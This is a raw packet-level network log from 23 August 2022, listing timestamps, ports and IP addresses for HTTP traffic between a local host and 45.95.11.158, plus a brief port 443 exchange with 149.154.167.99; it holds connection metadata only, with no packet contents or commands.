Aug 23, 2022 03:42:58.091182947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.091211081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091254950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.091456890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091500998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091542006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091543913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.091568947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091625929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.091856956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091895103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091929913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091957092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.091957092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.091974020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.092011929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.107194901 CEST	443	49810	149.154.167.99	192.168.2.3
Aug 23, 2022 03:42:58.107400894 CEST	49810	443	192.168.2.3	149.154.167.99
Aug 23, 2022 03:42:58.117321968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117367983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117409945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117449999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117487907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117525101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117527962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117551088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117557049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117574930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117597103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117621899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117639065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117646933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117679119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117707968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117722988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117744923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117748976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117821932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117861032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117867947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117888927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.117943048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.117981911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118024111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118026018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118067026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118094921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118144035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118164062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118205070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118212938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118216991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118246078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118277073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118304014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118334055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118417978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118457079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118498087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118525982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118525982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118586063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118590117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118760109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118803978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118825912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118841887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118851900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118870974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.118895054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.118935108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.119215012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.119256973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.119286060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.119301081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.119311094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.119329929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.119359970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.119378090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.119971991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120018005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120049000 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120059013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120086908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120104074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120126963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120138884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120168924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120179892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120208979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120215893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120238066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120253086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120429039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120470047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120491982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120507956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120515108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120537043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120578051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120585918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120616913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120625973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120659113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120683908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120690107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120697975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120728970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120747089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120769024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120778084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120806932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120836973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.120867014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.120893955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121118069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121159077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121197939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121227026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121236086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121267080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121273994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121310949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121351957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121370077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121380091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121397018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121426105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121649027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121689081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121726036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121731997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121747971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121761084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121774912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121799946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121840954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121849060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121886015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121911049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121939898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.121963978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.121984959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122196913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122240067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122283936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122312069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122319937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122353077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122356892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122385025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122392893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122402906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122431993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122440100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122461081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122490883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122500896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122505903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122540951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122548103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122582912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122586966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122611046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122648001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122665882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122701883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122756004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122790098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122832060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122859001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.122910023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.122939110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.123596907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123640060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123681068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123708010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.123712063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123744965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.123749971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123776913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.123792887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.123859882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123900890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123933077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.123980045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.124006987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.124516964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.124558926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.124599934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.124628067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.124645948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.124682903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149180889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149224997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149279118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149292946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149310112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149321079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149348021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149348974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149370909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149389982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149405003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149431944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149447918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149461985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149497032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149502039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149517059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149543047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149550915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149584055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149610996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149641037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149684906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149799109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149840117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149899006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.149905920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.149964094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150002956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150023937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150043011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150049925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150084019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150094986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150111914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150136948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150151968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150166035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150192022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150201082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150233030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150238037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150263071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150278091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150304079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150342941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150352001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150382996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150389910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150408983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150432110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150449991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150456905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150489092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150497913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150549889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.150557995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150587082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.150636911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.151844978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.151887894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.151918888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.151927948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.151931047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.151956081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152023077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152323961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152367115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152407885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152407885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152436972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152457952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152497053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152648926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152690887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152702093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152729988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152745962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152760983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.152806044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152826071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.152981997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153023005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153062105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153074026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153089046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153112888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153139114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153219938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153261900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153302908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153331041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153331041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153362989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153408051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153496027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153537989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153561115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153577089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153593063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153604984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153629065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153645039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153669119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153685093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153711081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153723001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153742075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153752089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153791904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153803110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153830051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153840065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153870106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153876066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153897047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.153949022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.153964043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154005051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154046059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154063940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154084921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154100895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154124975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154162884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154185057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154192924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154218912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154233932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154258013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154275894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154316902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154318094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154349089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154364109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154406071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154409885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.154496908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154542923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.154573917 CEST	49774	80	192.168.2.3	45.95.11.158
